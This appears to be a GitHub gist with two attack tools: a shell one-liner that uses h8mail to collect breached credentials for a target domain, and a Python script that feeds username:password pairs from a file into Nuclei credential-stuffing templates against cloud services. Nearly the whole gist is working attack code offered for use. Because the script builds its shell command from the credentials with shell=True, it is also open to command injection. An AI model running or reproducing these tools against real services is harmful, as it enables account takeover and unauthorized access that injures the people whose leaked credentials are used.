Created
September 24, 2023 13:18
-
-
Save nullenc0de/b6bb7623faeebb9d4eacf8b6f12124be to your computer and use it in GitHub Desktop.
h8mail -t "$1" -q domain -c ./h8mail_config.ini --skip -o /tmp/"$1".h8mail.csv && cat /tmp/"$1".h8mail.csv |grep "$1": |cut -d "-" -f2|tr -d ' ' |grep "$1" |sort -u
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import subprocess | |
import argparse | |
# Define the command to run Nuclei | |
nuclei_command = "nuclei -silent -t credential-stuffing/cloud -var username={} -var password={}" | |
# Create a command-line argument parser | |
parser = argparse.ArgumentParser(description='Credential Stuffing Scanner') | |
# Add an argument for specifying the creds.txt file | |
parser.add_argument('creds_file', help='Path to the creds.txt file') | |
# Parse the command-line arguments | |
args = parser.parse_args() | |
# Read and process the credentials from the specified file | |
with open(args.creds_file, 'r') as file: | |
for line in file: | |
parts = line.strip().split(':') | |
if len(parts) == 2: | |
username = parts[0] | |
password = parts[1] | |
# Execute Nuclei command with extracted credentials | |
subprocess.run(nuclei_command.format(username, password), shell=True) | |
print("Credential stuffing scan completed.") |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment